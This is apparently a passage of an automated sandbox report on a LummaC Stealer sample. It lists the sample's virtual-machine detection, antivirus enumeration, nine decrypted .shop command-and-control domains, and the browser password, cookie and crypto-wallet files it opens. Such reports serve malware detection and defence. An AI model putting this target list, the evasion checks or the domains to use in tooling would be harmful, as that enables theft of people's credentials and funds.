            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe TID: 3168Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe TID: 1068Thread sleep time: -30000s >= -30000sJump to behavior
            Source: Amcache.hve.3.drBinary or memory string: VMware
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649671760.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000002.1845085815.0000000004291000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.drBinary or memory string: vmci.sys
            Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.drBinary or memory string: VMware20,1
            Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00433CC0 LdrInitializeThunk,0_2_00433CC0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D0D90 mov eax, dword ptr fs:[00000030h]0_2_041D0D90
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_041D092B mov eax, dword ptr fs:[00000030h]0_2_041D092B
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_042654B3 push dword ptr fs:[00000030h]0_2_042654B3

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: o7b91j8vnJ.exeString found in binary or memory: tolerateilusidjukl.shop
            Source: o7b91j8vnJ.exeString found in binary or memory: productivelookewr.shop
            Source: o7b91j8vnJ.exeString found in binary or memory: strollheavengwu.shop
            Source: o7b91j8vnJ.exeString found in binary or memory: demonstationfukewko.shop
            Source: o7b91j8vnJ.exeString found in binary or memory: liabilitynighstjsko.shop
            Source: o7b91j8vnJ.exeString found in binary or memory: alcojoldwograpciw.shop
            Source: o7b91j8vnJ.exeString found in binary or memory: incredibleextedwj.shop
            Source: o7b91j8vnJ.exeString found in binary or memory: shortsvelventysjo.shop
            Source: o7b91j8vnJ.exeString found in binary or memory: shatterbreathepsw.shop
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1701691408.0000000004349000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1701622327.0000000006825000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: o7b91j8vnJ.exe PID: 6856, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668259812.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "ez": "ExodusWeb3"
            Source: o7b91j8vnJ.exe, 00000000.00000002.1843063129.0000000000196000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 7Aapp-store.jsonAWallets/BinanceC:\Users\user\AppData\Roaming\BinanceA%appdata%\Binance
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Ethereum",
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668259812.0000000004326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "keystore"
            Source: o7b91j8vnJ.exe, 00000000.00000002.1843063129.0000000000196000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 6AC:\Users\user\AppData\Roaming\Ledger Live+
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
